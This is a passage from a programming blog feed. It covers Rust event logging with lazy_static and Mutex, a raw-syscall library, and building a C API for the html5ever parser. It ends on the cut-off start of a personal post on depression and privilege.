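    println!("{} bytes", mem::size_of::<Event>());
}
```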
We didn&#39;t define a way to copy an event; this means the <code>String</code> buffer always has a unique owner who is responsible for freeing it.</p> <p>The <code>deriving(Show)</code> attribute tells the compiler to <a href="http://doc.rust-lang.org/reference.html#deriving">auto-generate</a>a text representation, so we can print an <code>Event</code>just as easily as a built-in type.</p> <p>Next we declare a global vector of events, protected by a mutex:</p><pre class='rust '><br /><span class='macro'>lazy_static</span><span class='macro'>!</span> {<br /> <span class='kw'>pub</span> <span class='kw'>static</span> <span class='kw-2'>ref</span> <span class='ident'>LOG</span>: <span class='ident'>Mutex</span><span class='op'>&lt;</span><span class='ident'>Vec</span><span class='op'>&lt;</span><span class='ident'>Event</span><span class='op'>&gt;&gt;</span><br /> <span class='op'>=</span> <span class='ident'>Mutex</span>::<span class='ident'>new</span>(<span class='ident'>Vec</span>::<span class='ident'>with_capacity</span>(<span class='number'>50_000</span>));<br />}<br /></pre> <p><code>lazy_static!</code> will initialize both of them when <code>LOG</code> is first used. Like <code>String</code>, the <code>Vec</code> is a growable buffer. We won&#39;t turn on event logging in release builds, so it&#39;s fine to pre-allocate space for 50,000 events. (You can put underscores anywhere in a integer literal to improve readability.)</p> <p><code>lazy_static!</code>, <code>Mutex</code>, and <code>Vec</code> are all implemented in Rust using gnarly low-level code. But the amazing thing is that all three expose a safe interface. It&#39;s simply not possible to use the variable before it&#39;s initialized, or to read the value the <code>Mutex</code> protects without locking it, or to modify the vector while iterating over it.</p> <p>The worst you can do is deadlock. And Rust considers that pretty bad, still, which is why it discourages global state. 
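<p>On current Rust the same lazily-initialized global can come from the standard library alone: <code>std::sync::OnceLock</code> (stable since Rust 1.70) plays the role <code>lazy_static!</code> plays in the post. A sketch, using <code>String</code> as the event payload to keep it self-contained:</p>

```rust
use std::sync::{Mutex, OnceLock};

// Lazily-initialized global log, protected by a mutex. The Vec is only
// allocated (with room for 50_000 events) on first use.
static LOG: OnceLock<Mutex<Vec<String>>> = OnceLock::new();

fn log(e: String) {
    LOG.get_or_init(|| Mutex::new(Vec::with_capacity(50_000)))
        .lock()
        .unwrap()
        .push(e);
}

fn main() {
    log("Intern(1)".to_string());
    log("Remove(1)".to_string());
    let n = LOG.get().unwrap().lock().unwrap().len();
    println!("{} events logged", n);
}
```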
But it&#39;s clearly what we need here. Rust takes a pragmatic approach to safety. You can always write <a href="http://doc.rust-lang.org/reference.html#unsafety">the <code>unsafe</code> keyword</a> and then use the same pointer tricks you&#39;d use in C. But you don&#39;t need to be quite so guarded when writing the other 95% of your code. I want a language that assumes I&#39;m brilliant but distracted :)</p> <p>Rust catches these mistakes at compile time, and produces the same code you&#39;d see with equivalent constructs in C++. For a more in-depth comparison, see Ruud van Asseldonk&#39;s <a href="http://ruudvanasseldonk.com/2014/08/10/writing-a-path-tracer-in-rust-part-1">excellent series of articles</a> about porting a spectral path tracer from C++ to Rust. The Rust code <a href="http://ruudvanasseldonk.com/2014/10/20/writing-a-path-tracer-in-rust-part-7-conclusion">performs</a> basically the same as Clang / GCC / MSVC on the same platform. Not surprising, because Rust uses <a href="http://llvm.org/">LLVM</a> and benefits from the same backend optimizations as Clang.</p> <p><code>lazy_static!</code> is not a built-in language feature; it&#39;s a <a href="http://doc.rust-lang.org/guide-macros.html">macro</a> provided by <a href="https://github.com/Kimundi/lazy-static.rs">a third-party library</a>. Since the library uses <a href="http://doc.crates.io/">Cargo</a>, I can include it in my project by adding</p> <pre><code class="language-toml">[dependencies.lazy_static]<br />git = &quot;https://github.com/Kimundi/lazy-static.rs&quot;<br /></code></pre> <p>to <code>Cargo.toml</code> and then adding</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>phase</span>(<span class='ident'>plugin</span>)]</span><br /><span class='kw'>extern</span> <span class='kw'>crate</span> <span class='ident'>lazy_static</span>;<br /></pre> <p>to <code>src/lib.rs</code>. Cargo will automatically fetch and build all dependencies. 
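</p>

<p>On the earlier point about <code>unsafe</code>: the usual idiom is to confine the C-style pointer tricks to a small <code>unsafe</code> block behind a safe function, so callers stay in the guarded 95%. A minimal illustration (my example, not from the post):</p>

```rust
// A safe wrapper around a C-style pointer dereference: the unsafe block is
// small and locally checkable, and the function's signature is fully safe.
fn first_byte(buf: &[u8]) -> Option<u8> {
    if buf.is_empty() {
        None
    } else {
        // Raw-pointer access, as one might write in C; the emptiness check
        // above is what makes this sound.
        unsafe { Some(*buf.as_ptr()) }
    }
}

fn main() {
    assert_eq!(first_byte(b"hello"), Some(b'h'));
    assert_eq!(first_byte(b""), None);
    println!("ok");
}
```

<p>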
Code reuse becomes no harder than in your favorite scripting language.</p> <p>Finally, we define a function that pushes a new event onto the vector:</p><pre class='rust '><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>log</span>(<span class='ident'>e</span>: <span class='ident'>Event</span>) {<br /> <span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>push</span>(<span class='ident'>e</span>);<br />}<br /></pre> <p><code>LOG.lock()</code> produces an <a href="http://en.wikipedia.org/wiki/Resource_Acquisition_Is_Initialization">RAII</a> handle that will automatically unlock the mutex when it falls out of scope. In C++ I always hesitate to use temporaries like this because if they&#39;re destroyed too soon, my program will segfault or worse. Rust has compile-time <a href="http://doc.rust-lang.org/guide-lifetimes.html">lifetime checking</a>, so I can do things that <a href="http://www.randomhacks.net/2014/09/19/rust-lifetimes-reckless-cxx/">would be reckless</a> in C++.</p> <p>If you scroll up you&#39;ll see a lot of prose and not a lot of code. That&#39;s because I got a huge amount of functionality for free. 
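</p>

<p>The RAII behavior of <code>lock()</code> is easy to see in isolation. In current Rust, <code>Mutex::lock()</code> returns a guard whose destructor releases the lock:</p>

```rust
use std::sync::Mutex;

// Minimal demonstration of the RAII guard returned by Mutex::lock():
// the mutex is released when the guard goes out of scope, not by an
// explicit unlock() call.
fn main() {
    let m = Mutex::new(Vec::new());
    {
        let mut guard = m.lock().unwrap(); // locked here
        guard.push(1);
        guard.push(2);
    } // guard dropped: unlocked here
    // If the guard above were still alive, this second lock() would block.
    assert_eq!(m.lock().unwrap().len(), 2);
    println!("ok");
}
```

<p>Because the compiler tracks the guard&#39;s lifetime, holding it too long is a visible mistake rather than a latent segfault.</p>

<p>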
Here&#39;s the logging module again:</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>deriving</span>(<span class='ident'>Show</span>)]</span><br /><span class='kw'>pub</span> <span class='kw'>enum</span> <span class='ident'>Event</span> {<br /> <span class='ident'>Intern</span>(<span class='ident'>u64</span>),<br /> <span class='ident'>Insert</span>(<span class='ident'>u64</span>, <span class='ident'>String</span>),<br /> <span class='ident'>Remove</span>(<span class='ident'>u64</span>),<br />}<br /><br /><span class='macro'>lazy_static</span><span class='macro'>!</span> {<br /> <span class='kw'>pub</span> <span class='kw'>static</span> <span class='kw-2'>ref</span> <span class='ident'>LOG</span>: <span class='ident'>Mutex</span><span class='op'>&lt;</span><span class='ident'>Vec</span><span class='op'>&lt;</span><span class='ident'>Event</span><span class='op'>&gt;&gt;</span><br /> <span class='op'>=</span> <span class='ident'>Mutex</span>::<span class='ident'>new</span>(<span class='ident'>Vec</span>::<span class='ident'>with_capacity</span>(<span class='number'>50_000</span>));<br />}<br /><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>log</span>(<span class='ident'>e</span>: <span class='ident'>Event</span>) {<br /> <span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>push</span>(<span class='ident'>e</span>);<br />}<br /></pre> <p>This goes in <code>src/event.rs</code> and we include it from <code>src/lib.rs</code>.</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>cfg</span>(<span class='ident'>feature</span> <span class='op'>=</span> <span class='string'>&quot;log-events&quot;</span>)]</span><br /><span class='kw'>pub</span> <span class='kw'>mod</span> <span class='ident'>event</span>;<br /></pre> <p>The <a href="http://doc.rust-lang.org/reference.html#conditional-compilation"><code>cfg</code> attribute</a> is how Rust does conditional 
compilation. Another project can specify</p> <pre><code class="language-toml">[dependencies.string_cache]<br />git = &quot;https://github.com/servo/string-cache&quot;<br />features = [&quot;log-events&quot;]<br /></code></pre> <p>and add code to dump the log:</p><pre class='rust '><br /><span class='kw'>for</span> <span class='ident'>e</span> <span class='kw'>in</span> <span class='ident'>string_cache</span>::<span class='ident'>event</span>::<span class='ident'>LOG</span>.<span class='ident'>lock</span>().<span class='ident'>iter</span>() {<br /> <span class='macro'>println</span><span class='macro'>!</span>(<span class='string'>&quot;{}&quot;</span>, <span class='ident'>e</span>);<br />}<br /></pre> <p>Any project which doesn&#39;t opt in to <code>log-events</code> will see zero impact from any of this.</p> <p>If you&#39;d like to learn Rust, the <a href="http://doc.rust-lang.org/guide.html">Guide</a> is a good place to start. We&#39;re getting <a href="http://blog.rust-lang.org/2014/09/15/Rust-1.0.html">close to 1.0</a> and the important concepts have been stable for a while, but the details of syntax and libraries are still in flux. It&#39;s not too early to learn, but it might be too early to maintain a large library.</p> <p>By the way, here are the events generated by interning the three strings <code>foobarbaz</code> <code>foo</code> <code>blockquote</code>:</p> <pre><code class="language-text">Insert(0x7f1daa023090, foobarbaz)<br />Intern(0x7f1daa023090)<br />Intern(0x6f6f6631)<br />Intern(0xb00000002)<br /></code></pre> <p>There are three different kinds of IDs, indicated by the least significant bits. The first is a pointer into a standard interning table, which is protected by a mutex. The other two are created without synchronization, which improves parallelism between parser threads.</p> <p>In UTF-8, the string <code>foo</code> is smaller than a 64-bit pointer, so we store the characters directly. 
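</p>

<p>The inline-string encoding can be sketched as follows. The tag value and byte layout here are invented for illustration; string-cache&#39;s actual bit layout differs (as the <code>0x6f6f6631</code> ID above shows):</p>

```rust
// Sketch of packing a short UTF-8 string into a u64 "inline atom".
// The tag in the low byte is hypothetical; the real crate's encoding differs.
fn pack_inline(s: &str) -> Option<u64> {
    let bytes = s.as_bytes();
    if bytes.len() > 7 {
        return None; // must leave room for the tag byte
    }
    let mut v: u64 = 0;
    for (i, &b) in bytes.iter().enumerate() {
        v |= (b as u64) << (8 * (i + 1));
    }
    Some(v | 0x1) // low bit marks this as an inline atom, not a pointer
}

fn main() {
    let id = pack_inline("foo").unwrap();
    assert_eq!(id, 0x6f6f6601);
    assert_eq!(pack_inline("blockquote"), None); // 10 bytes: too big to inline
    println!("foo packs to {:#x}", id);
}
```

<p>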
<code>blockquote</code> is too big for that, but it corresponds to a well-known HTML tag. <code>0xb</code> is the index of <code>blockquote</code> in <a href="https://github.com/servo/string-cache/blob/master/macros/src/atom/data.rs">a static list</a> of strings that are common on the Web. Static atoms can also be used <a href="https://github.com/servo/string-cache/blob/09a935e64248ca70bd6da12f9760a0fec9ea43fd/src/atom.rs#L533-L552">in pattern matching</a>, and LLVM&#39;s optimizations for C&#39;s <code>switch</code> statements will apply.</p>http://mainisusuallyafunction.blogspot.com/2014/10/a-taste-of-rust-yum-for-cc-programmers_29.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-760465688770961358Thu, 18 Sep 2014 00:33:00 +00002014-09-17T17:33:56.578-07:00imadethisrustsystemsRaw system calls for Rust<p>I wrote <a href="https://github.com/kmcallister/syscall.rs">a small library</a> for making raw system calls from Rust programs. It provides a macro that expands into in-line system call instructions, with no run-time dependencies at all. Here's an example:</p><pre class="sourceCode rust"><code class="sourceCode rust"><span class="st">#![feature(phase)]</span><br /><br /><span class="st">#[phase(plugin, link)]</span><br /><span class="kw">extern crate</span> syscall;<br /><br /><span class="kw">fn</span> write(fd: <span class="dt">uint</span>, buf: <span class="ot">&amp;</span>[<span class="dt">u8</span>]) {<br /> <span class="kw">unsafe</span> {<br /> syscall!(WRITE, fd, buf.as_ptr(), buf.len());<br /> }<br />}<br /><br /><span class="kw">fn</span> main() {<br /> write(1, <span class="st">&quot;Hello, world!\n&quot;</span>.as_bytes());<br />}</code></pre><p>Right now it only supports x86-64 Linux, but I'd love to add other platforms. Pull requests are much appreciated. 
:)</p>http://mainisusuallyafunction.blogspot.com/2014/09/raw-system-calls-for-rust.htmlnoreply@blogger.com (keegan)2tag:blogger.com,1999:blog-1563623855220143059.post-4580674045745301078Thu, 28 Aug 2014 05:45:00 +00002014-08-27T23:18:40.585-07:00html5everimadethismozillarustCalling a Rust library from C (or anything else!)<p>One reason I'm excited about <a href="http://www.rust-lang.org/">Rust</a> is that I can compile Rust code to a simple native-code library, without heavy runtime dependencies, and then call it from any language. Imagine writing performance-critical extensions for Python, Ruby, or Node in a safe, pleasant language that has <a href="http://doc.rust-lang.org/guide-lifetimes.html">static lifetime checking</a>, <a href="http://doc.rust-lang.org/tutorial.html#pattern-matching">pattern matching</a>, a <a href="http://doc.rust-lang.org/guide-macros.html">real macro system</a>, and other goodies like that. For this reason, when I started <a href="https://github.com/kmcallister/html5ever">html5ever</a> some six months ago, I wanted it to be more than another &quot;Foo for BarLang&quot; project. I want it to be <em>the</em> HTML parser of choice, for a wide variety of applications in any language.</p><p>Today I started work in earnest on the C API for html5ever. In only a few hours I had a working demo. 
And this is a fairly complicated library, with 5,000+ lines of code incorporating</p><ul class="incremental"><li>most of the <a href="http://www.whatwg.org/specs/web-apps/current-work/multipage/syntax.html">hilariously complicated parsing rules</a> in the HTML spec,</li><li>a <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/macros/src/match_token.rs">Rust syntax extension</a> for writing parse rules in a concise form that matches the spec,</li><li>compile-time <a href="https://github.com/sfackler/rust-phf">perfect hash maps</a> for string interning and named characters, and</li><li>lots and lots of generic code — if this library were written in C++, almost all of it would be in header files.</li></ul><p>It's pretty cool that we can use all this machinery from C, or any language that can call C. I'll describe first how to build and use the library, and then I'll talk about the implementation of the C API.</p><p>html5ever (for C or for Rust) is not finished yet, but if you're feeling adventurous, you are welcome to try it out! And I'd love to have more contributors. 
Let me know <a href="https://github.com/kmcallister/html5ever/issues">on GitHub</a> about any issues you run into.</p><h1 id="using-html5ever-from-c">Using html5ever from C</h1><p>Like most Rust libraries, html5ever builds with <a href="http://crates.io/">Cargo</a>.</p><pre><code>$ git clone https://github.com/kmcallister/html5ever<br />$ cd html5ever<br />$ git checkout dev<br />$ cargo build<br /> Updating git repository `https://github.com/sfackler/rust-phf`<br /> Compiling phf_mac v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)<br /> Compiling html5ever-macros v0.0.0 (file:///tmp/html5ever)<br /> Compiling phf v0.0.0 (https://github.com/sfackler/rust-phf#f21e2a41)<br /> Compiling html5ever v0.0.0 (file:///tmp/html5ever)</code></pre><p>The C API isn't Cargo-ified yet, so we'll build it using the older Makefile-based system.</p><pre><code>$ mkdir build<br />$ cd build<br />$ ../configure<br />$ make libhtml5ever_for_c.a<br />rustc -D warnings -C rpath -L /tmp/html5ever/target -L /tmp/html5ever/target/deps \<br /> -o libhtml5ever_for_c.a --cfg for_c --crate-type staticlib /tmp/html5ever/src/lib.rs<br />warning: link against the following native artifacts when linking against this static library<br />note: the order and any duplication can be significant on some platforms, and so may need to be preserved<br />note: library: rt<br />note: library: dl<br />note: library: pthread<br />note: library: gcc_s<br />note: library: pthread<br />note: library: c<br />note: library: m</code></pre><p>Now we can build an <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/examples/capi/tokenize.c">example C program</a> using that library, and following the link instructions produced by <code>rustc</code>.</p><pre><code>$ H5E_PATH=/tmp/html5ever<br />$ gcc -Wall -o tokenize tokenize.c -I $H5E_PATH/capi -L $H5E_PATH/build \<br /> -lhtml5ever_for_c -lrt -ldl -lpthread -lgcc_s -lpthread -lc -lm<br /><br />$ ./tokenize 
&#39;Hello&amp;comma; &lt;i class=excellent&gt;world!&lt;/i&gt;&#39;<br />CHARS : Hello<br />CHARS : ,<br />CHARS : <br />TAG : &lt;i&gt;<br /> ATTR: class=&quot;excellent&quot;<br />CHARS : world!<br />TAG : &lt;/i&gt;</code></pre><p>The build process is pretty standard for C; we just link a <code>.a</code> file and its dependencies. The biggest obstacle right now is that you won't find the Rust compiler in your distro's package manager, because the language is still changing so rapidly. But there's a ton of effort going into stabilizing the language for a Rust 1.0 release this year. It won't be too long before <code>rustc</code> is a reasonable build dependency.</p><p>Let's look at the C client code.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#include &lt;stdio.h&gt;</span><br /><br /><span class="ot">#include &quot;html5ever.h&quot;</span><br /><br /><span class="dt">void</span> put_str(<span class="dt">const</span> <span class="dt">char</span> *x) {<br /> fputs(x, stdout);<br />}<br /><br /><span class="dt">void</span> put_buf(<span class="kw">struct</span> h5e_buf text) {<br /> fwrite(text.data, text.len, <span class="dv">1</span>, stdout);<br />}<br /><br /><span class="dt">void</span> do_start_tag(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name, <span class="dt">int</span> self_closing, size_t num_attrs) {<br /> put_str(<span class="st">&quot;TAG : &lt;&quot;</span>);<br /> put_buf(name);<br /> <span class="kw">if</span> (self_closing) {<br /> putchar(&#39;/&#39;);<br /> }<br /> put_str(<span class="st">&quot;&gt;</span><span class="ch">\n</span><span class="st">&quot;</span>);<br />}<br /><br /><span class="co">// ...</span><br /><br /><span class="kw">struct</span> h5e_token_ops ops = {<br /> .do_chars = do_chars,<br /> .do_start_tag = do_start_tag,<br /> .do_tag_attr = do_tag_attr,<br /> .do_end_tag = do_end_tag,<br />};<br /><br /><span class="kw">struct</span> h5e_token_sink sink = {<br /> 
.ops = &amp;ops,<br /> .user = NULL,<br />};<br /><br /><span class="dt">int</span> main(<span class="dt">int</span> argc, <span class="dt">char</span> *argv[]) {<br /> <span class="kw">if</span> (argc &lt; <span class="dv">2</span>) {<br /> printf(<span class="st">&quot;Usage: %s &#39;HTML fragment&#39;</span><span class="ch">\n</span><span class="st">&quot;</span>, argv[<span class="dv">0</span>]);<br /> <span class="kw">return</span> <span class="dv">1</span>;<br /> }<br /><br /> <span class="kw">struct</span> h5e_tokenizer *tok = h5e_tokenizer_new(&amp;sink);<br /> h5e_tokenizer_feed(tok, h5e_buf_from_cstr(argv[<span class="dv">1</span>]));<br /> h5e_tokenizer_end(tok);<br /> h5e_tokenizer_free(tok);<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}</code></pre><p>The <code>struct h5e_token_ops</code> contains pointers to callbacks. Any events we don't care to handle are left as NULL function pointers. Inside <code>main</code>, we create a tokenizer and feed it a string. html5ever for C uses a simple pointer+length representation of buffers, which is this <code>struct h5e_buf</code> you see being passed by value.</p><p>This demo only does tokenization, not tree construction. html5ever can perform both phases of parsing, but the API surface for tree construction is much larger and I didn't get around to writing C bindings yet.</p><h1 id="implementing-the-c-api">Implementing the C API</h1><p>Some parts of Rust's <a href="http://doc.rust-lang.org/std/index.html"><code>libstd</code></a> depend on runtime services, such as task-local data, that a C program may not have initialized. So the <a href="https://github.com/kmcallister/html5ever/commit/222affd0caa132eabb1f14f47b489c161f968b42">first step</a> in building a C API was to eliminate all <code>std::</code> imports. 
This isn't nearly as bad as it sounds, because large parts of <code>libstd</code> are just re-exports from other libraries like <a href="http://doc.rust-lang.org/core/index.html"><code>libcore</code></a> that we can use with no trouble. To be fair, I did write html5ever with the goal of a C API in mind, and I avoided features like threading that would be difficult to integrate. So your library might give you more trouble, depending on which Rust features you use.</p><p>The <a href="https://github.com/kmcallister/html5ever/commit/c30deff17923294c39890986099e3ead64be29e3">next step</a> was to add the <code>#![no_std]</code> crate attribute. This means we no longer import <a href="http://doc.rust-lang.org/std/prelude/index.html">the standard prelude</a> into every module. To compensate, I added <code>use core::prelude::*;</code> to most of my modules. This brings in <a href="http://doc.rust-lang.org/core/prelude/index.html">the parts of the prelude</a> that can be used without runtime system support. I also added many imports for ubiquitous types like <code>String</code> and <code>Vec</code>, which come from <code>libcollections</code>.</p><p>After that I had to <a href="https://github.com/kmcallister/html5ever/commit/89f2f45af0425271d4c79a73f00fd42eca00dad8">get rid of the last references to <code>libstd</code></a>. The biggest obstacle here involved macros and <a href="http://doc.rust-lang.org/tutorial.html#deriving-implementations-for-traits"><code>deriving</code></a>, which would produce references to names under <code>std::</code>. To work around this, I create <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/lib.rs#L87-L93">a fake little <code>mod std</code></a> which re-exports the necessary parts of <code>core</code> and <code>collections</code>. 
This is similar to <a href="https://github.com/rust-lang/rust/blob/0d3bd7720c50e3ada4bac77331d43926493be4fe/src/libstd/lib.rs#L273-L277"><code>libstd</code>'s &quot;curious inner-module&quot;</a>.</p><p>I also had to remove all uses of <code>format!()</code>, <code>println!()</code>, etc., or move them inside <code>#[cfg(not(for_c))]</code>. I needed to <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/macros.rs#L59-L69">copy in the <code>vec!()</code> macro</a> which is only provided by <code>libstd</code>, even though the <code>Vec</code> type is provided by <code>libcollections</code>. And I had to omit debug log messages when building for C; I did this with <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/macros.rs#L71-L90">conditionally-defined macros</a>.</p><p>With all this preliminary work done, it was time to write <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs">the C bindings</a>. Here's how the struct of function pointers looks on the Rust side:</p><pre class="rust"><code>#[repr(C)]<br />pub struct h5e_token_ops {<br /> do_start_tag: extern &quot;C&quot; fn(user: *mut c_void, name: h5e_buf,<br /> self_closing: c_int, num_attrs: size_t),<br /> <br /> do_tag_attr: extern &quot;C&quot; fn(user: *mut c_void, name: h5e_buf,<br /> value: h5e_buf),<br /><br /> do_end_tag: extern &quot;C&quot; fn(user: *mut c_void, name: h5e_buf),<br /><br /> // ...<br />}</code></pre><p>The <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L49-L111">processing of tokens</a> is straightforward. We pattern-match and then call the appropriate function pointer, <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L53">unless</a> that pointer is NULL. 
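</p>

<p>The NULL-check-then-call pattern can be sketched like this, using <code>Option&lt;extern &quot;C&quot; fn&gt;</code> for the nullable callback. This is a simplified stand-in for html5ever&#39;s real <code>h5e_token_ops</code>, not its actual definition:</p>

```rust
use std::os::raw::c_void;

// Optional callbacks are stored as Option<extern "C" fn>, which has the same
// one-word representation as a nullable C function pointer (None == NULL).
#[repr(C)]
pub struct TokenOps {
    pub do_chars: Option<extern "C" fn(user: *mut c_void, len: usize)>,
}

fn fire_chars(ops: &TokenOps, user: *mut c_void, len: usize) {
    if let Some(f) = ops.do_chars {
        f(user, len);
    } // a None (NULL) callback is silently skipped
}

extern "C" fn print_chars(_user: *mut c_void, len: usize) {
    println!("CHARS of length {}", len);
}

fn main() {
    let ops = TokenOps { do_chars: Some(print_chars) };
    fire_chars(&ops, std::ptr::null_mut(), 5);
    let silent = TokenOps { do_chars: None };
    fire_chars(&silent, std::ptr::null_mut(), 5); // no-op
}
```

<p>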
(<b>Edit:</b> eddyb points out that storing NULL as an <code>extern "C" fn</code> is undefined behavior. Better to use <code>Option&lt;extern "C" fn ...&gt;</code>, which will optimize to the same one-word representation.) </p><p>To <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L115-L122">create a tokenizer</a>, we heap-allocate the Rust data structure in a <a href="http://doc.rust-lang.org/alloc/boxed/index.html"><code>Box</code></a>, and then <a href="http://doc.rust-lang.org/core/intrinsics/ffi.transmute.html">transmute</a> that to a raw C pointer. When the C client calls <code>h5e_tokenizer_free</code>, we transmute this pointer back to a box and <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L126">drop it</a>, which will invoke destructors and finally free the memory.</p><p>You'll note that the functions exported to C have several special annotations:</p><ul class="incremental"><li><code>#[no_mangle]</code>: skip <a href="http://en.wikipedia.org/wiki/Name_mangling">name mangling</a>, so we end up with a linker symbol named <code>h5e_tokenizer_free</code> instead of <code>_ZN5for_c9tokenizer18h5e_tokenizer_free</code>.</li><li><code>unsafe</code>: don't let Rust code call these functions unless it <a href="http://doc.rust-lang.org/rust.html#unsafe-blocks">promises to be careful</a>.</li><li><code>extern &quot;C&quot;</code>: make sure the exported function has a C-compatible <a href="http://en.wikipedia.org/wiki/Application_binary_interface">ABI</a>. 
The data structures similarly get a <code>#[repr(C)]</code> attribute.</li></ul><p>Then I wrote a <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/capi/html5ever.h">C header file</a> matching this ABI:</p><pre class="sourceCode c"><code class="sourceCode c"><span class="kw">struct</span> h5e_buf {<br /> <span class="dt">unsigned</span> <span class="dt">char</span> *data;<br /> size_t len;<br />};<br /><br /><span class="kw">struct</span> h5e_buf h5e_buf_from_cstr(<span class="dt">const</span> <span class="dt">char</span> *str);<br /><br /><span class="kw">struct</span> h5e_token_ops {<br /> <span class="dt">void</span> (*do_start_tag)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name,<br /> <span class="dt">int</span> self_closing, size_t num_attrs);<br /><br /> <span class="dt">void</span> (*do_tag_attr)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name,<br /> <span class="kw">struct</span> h5e_buf value);<br /><br /> <span class="dt">void</span> (*do_end_tag)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name);<br /><br /> <span class="co">///</span> ...<br />};<br /><br /><span class="kw">struct</span> h5e_tokenizer;<br /><br /><span class="kw">struct</span> h5e_tokenizer *h5e_tokenizer_new(<span class="kw">struct</span> h5e_token_sink *sink);<br /><span class="dt">void</span> h5e_tokenizer_free(<span class="kw">struct</span> h5e_tokenizer *tok);<br /><span class="dt">void</span> h5e_tokenizer_feed(<span class="kw">struct</span> h5e_tokenizer *tok, <span class="kw">struct</span> h5e_buf buf);<br /><span class="dt">void</span> h5e_tokenizer_end(<span class="kw">struct</span> h5e_tokenizer *tok);</code></pre><p>One remaining issue is that Rust is hard-wired to use <a href="http://www.canonware.com/jemalloc/">jemalloc</a>, so linking html5ever will bring that in alongside the system's libc malloc. 
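</p>

<p>As an aside, the heap-allocate-then-hand-to-C dance described earlier can be written today without <code>transmute</code>, via <code>Box::into_raw</code> and <code>Box::from_raw</code>. A simplified sketch — the names mimic the html5ever API, but this is not its real implementation:</p>

```rust
// Handing a Rust heap allocation to C and back. In a real C API these
// functions would also carry #[no_mangle] so the linker symbol is predictable.
pub struct Tokenizer {
    input: String, // stand-in for the real parser state
}

pub extern "C" fn tokenizer_new() -> *mut Tokenizer {
    // Box allocates on the heap; into_raw releases ownership to the caller.
    Box::into_raw(Box::new(Tokenizer { input: String::new() }))
}

/// Safety: `tok` must be a pointer returned by `tokenizer_new`, not yet freed.
pub unsafe extern "C" fn tokenizer_free(tok: *mut Tokenizer) {
    if !tok.is_null() {
        // from_raw reclaims ownership; dropping the Box runs destructors
        // and frees the memory.
        drop(Box::from_raw(tok));
    }
}

fn main() {
    let tok = tokenizer_new();
    assert!(!tok.is_null());
    unsafe { tokenizer_free(tok) };
    println!("allocated and freed cleanly");
}
```

<p>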
Having two separate malloc heaps will likely increase memory consumption, and it prevents us from doing fun things like allocating <code>Box</code>es in Rust that can be used and freed in C. Before Rust can really be a great choice for writing C libraries, we need a better solution for integrating the allocators.</p><p>If you'd like to talk about calling Rust from C, you can find me as <code>kmc</code> in <code>#rust</code> and <code>#rust-internals</code> on <code>irc.mozilla.org</code>. And if you run into any issues with html5ever, do let me know, preferably by <a href="https://github.com/kmcallister/html5ever/issues">opening an issue on GitHub</a>. Happy hacking!</p>http://mainisusuallyafunction.blogspot.com/2014/08/calling-rust-library-from-c-or-anything.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-5769838398217923874Wed, 11 Jun 2014 05:06:00 +00002014-06-10T22:06:50.703-07:00On depression, privilege, and online activism<p>[Content warning: depression, privilege, online activism]</p><p>This isn't a general account of my experiences with depression. Many people have written about that, and I don't have much to add. But there's one aspect that I don't hear about very often. It's something that bothers me a lot, and others have told me that it bothers them too.</p><p>The thing is, I'm not just a person with a mental illness. I'm also a well-off white guy, and I enjoy a whole set of unearned privileges from that. Every day people around the world are harassed, abused, and killed over things I never have to worry about. Even in mundane daily life, most everyone is <a href="http://whatever.scalzi.com/2012/05/15/straight-white-male-the-lowest-difficulty-setting-there-is/">playing on a higher difficulty setting</a> than I ever will.</p><p>I've thought about this a lot over the past few years, and I'm trying to understand how I can help make the world more fair and less oppressive. 
So I give money and I volunteer a little and I speak up when it seems useful, but mostly I listen. I listen to the experiences of people who are different from me. I try to get some understanding of how they feel and why.</p><p>How is this related to depression? Because the reality of privilege and oppression is fucking depressing. Of course it's depressing to those who are directly harmed. That's a lot of what I read about, and some of the despair transfers to me. But my profiting from the suffering of others in a way that I mostly can't change is also depressing, at least if I make an attempt not to ignore it.</p><p>And my distress over my role in systems of oppression brings its own layer of guilt. People are actually suffering and I feel sorry for myself because I'm dimly aware of it? But this comes from the voice that has always taunted me about depression. “How can you be sad? Your life is great. If you had real problems you wouldn't be so pathetic. You're not really sick. You're just a whiner.”</p><p>All of which is part of the disease. I need to own it and work on it every day. But it seems like every time I read an online discussion about social justice, I take a huge step backwards.</p><p>It's hard to shrug off the “men are horrible” comments when I spend so much effort trying to convince myself that I'm not horrible. When I hear people gloating about delicious white male tears, I think about all the times when I would come home from work and collapse in bed crying. Is this what they want my life to be?</p><p>I 